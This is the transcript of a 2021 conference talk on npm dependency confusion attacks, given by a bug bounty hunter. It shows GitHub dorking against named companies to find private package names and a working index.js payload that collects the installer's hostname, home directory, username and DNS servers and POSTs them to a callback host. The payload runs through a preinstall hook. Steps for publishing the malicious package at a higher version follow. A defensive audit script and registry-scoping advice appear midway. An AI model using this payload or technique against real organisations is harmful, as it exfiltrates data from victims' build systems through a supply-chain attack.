Dependency Confusion

Aditya Shende
November 23, 2021

DAMNCON, the cyber conference. This will provide you with meaningful insights and the right knowledge for you to move to the next step.

Speaker: Aditya Shende

Topic: Dependency Confusion

Transcript

  1. WHOAMI ?
     Bug Bounty Hunter and Trainer
     Red Team Ops @Agri10x
     Masters In Cyber Security @UEA
     Interested in WebApps, Functional Exploits and Bikes
     INDIAN

  2. Dependency Confusion

  3. What is Dependency Confusion?
     A Dependency Confusion attack, also known as a supply chain substitution attack,
     occurs when a software installer script is tricked into downloading a malicious
     code file from a public repository rather than the intended file of the same name
     from an internal repository.

  4. Difference?
     1. As seen in the image above, the public package carries a higher version
        number than the private package.
     2. As a result, if registry resolution is not configured properly, the installer
        automatically retrieves the higher-version package from the public registry.

  5. How to find Private Packages?
     Within an organization, use GitHub dorking with keywords like package.json:

     org:Samsung package.json

     Use filters like language:json

     org:Samsung package.json language:json

     org:target_org package.json language:json

  6. Private packages can also be found using the npm package.json disclosure nuclei template.

  7. Case Study
     1. https://github.com/facebook/flipper/blob/45ce538c8dd6b448388a01e2ed4fa398956e5e20/desktop/eslint-plugin-flipper/package.json
     2. Package Name: eslint-plugin-flipper
     3. Type: Private

     wget https://github.com/facebook/flipper/blob/45ce538c8dd6b448388a01e2ed4fa398956e5e20/desktop/eslint-plugin-flipper/package.json

  8. We have to check whether a package with the private package's name exists on the public registry.
     Check on the official website: https://www.npmjs.com/
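
     The check on this slide (does a public package with the same name exist?) together with the version rule from slide 4 can be turned into a repeatable audit. The following is an added example, not code from the talk: the package.json contents, the list of internal package names and the public "latest" versions are all constructed inline, and in a real run the public versions would be fetched from https://registry.npmjs.org/<name> instead.

```javascript
// Added example (not from the talk): audit a package.json for dependency
// confusion exposure. All inputs below are constructed; in practice
// publicLatest would be built from https://registry.npmjs.org/<name>
// ("dist-tags".latest) for each internal package name.

// Pull the first X.Y.Z out of a version or range spec such as "^1.2.0".
function parseVersion(spec) {
  const m = String(spec).match(/(\d+)\.(\d+)\.(\d+)/);
  if (!m) throw new Error(`unsupported version spec: ${spec}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Comparator: negative if a < b, zero if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] - pb[i];
  return 0;
}

// Classify each dependency that is served from the internal registry:
//   "shadowed"  - a public package of the same name has a higher version,
//                 the slide 4 condition under which the public copy wins
//   "collides"  - a public package exists at a lower version (one public
//                 version bump away from "shadowed")
//   "unclaimed" - no public package of that name exists yet (slide 8)
// Scoped names (@org/pkg) are skipped when the organisation owns the scope.
function auditDependencies(pkg, privateNames, publicLatest, ownedScopes = []) {
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  const findings = [];
  for (const [name, spec] of Object.entries(deps)) {
    if (!privateNames.has(name)) continue;
    const scope = name.startsWith("@") ? name.split("/")[0] : null;
    if (scope && ownedScopes.includes(scope)) continue;
    const pub = publicLatest[name];
    let status = "unclaimed";
    if (pub !== undefined) status = compareVersions(pub, spec) > 0 ? "shadowed" : "collides";
    findings.push({ name, privateVersion: spec, publicVersion: pub ?? null, status });
  }
  return findings;
}

// Constructed sample input: one genuinely public dependency, three internal ones.
const SAMPLE_PKG = { dependencies: { "internal-auth-lib": "1.2.0", "acme-build-tools": "^0.9.0",
  "@acme/logger": "2.0.0", lodash: "^4.17.21" } };
const PRIVATE_NAMES = new Set(["internal-auth-lib", "acme-build-tools", "@acme/logger"]);
const PUBLIC_LATEST = { "internal-auth-lib": "99.0.0", "acme-build-tools": "0.2.0", lodash: "4.17.21" };

function runSample() { return auditDependencies(SAMPLE_PKG, PRIVATE_NAMES, PUBLIC_LATEST, ["@acme"]); }
```

     Anything reported as "shadowed" or "unclaimed" is a candidate for moving under an organisation-owned scope that is pinned to the internal registry in .npmrc (for example @acme:registry=https://registry.internal.example), which removes the name collision instead of racing the public registry on version numbers.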

  9. Creating Malicious Packages (NPM)
     Install NPM and create the package using the following commands:
     1. apt install npm
     2. npm login
     3. npm init : Create package

  10. After successfully creating the package.json file, we need to edit the created file so that it
      executes our own scripts and commands. index.js:

      const os = require("os");
      const dns = require("dns");
      const querystring = require("querystring");
      const https = require("https");
      const packageJSON = require("./package.json");
      const package = packageJSON.name;

      // Data collected from the host that installed the package.
      const trackingData = JSON.stringify({
        p: package,
        c: __dirname,
        hd: os.homedir(),
        hn: os.hostname(),
        un: os.userInfo().username,
        dns: dns.getServers(),
        r: packageJSON ? packageJSON.___resolved : undefined,
        v: packageJSON.version,
        pjson: packageJSON,
      });

      var postData = querystring.stringify({ msg: trackingData });

      var options = {
        hostname: "burpcollaborator.net", // replace burpcollaborator.net with Interactsh or pipedream
        port: 443,
        path: "/",
        method: "POST",
        headers: {
          "Content-Type": "application/x-www-form-urlencoded",
          "Content-Length": postData.length,
        },
      };

      // POST the collected data to the callback host; errors are silently ignored.
      var req = https.request(options, (res) => {
        res.on("data", (d) => { process.stdout.write(d); });
      });
      req.on("error", (e) => {
        // console.error(e);
      });
      req.write(postData);
      req.end();

  11. Pushing into Public Registry (NPM)
      Now two files have been created: package.json and index.js.
      Before publishing the package to the public registry, make sure this package name
      doesn't already exist in the public registry.
      Use the following command to publish the package.

  12. The published package carries a higher version than the original one.

  13. packages, our package.json preinstall script will execute the index.js file and obtain
      the hostname, directory, IP address, and username, as shown below.

  14. Thank you guys
      DAMNcon2021

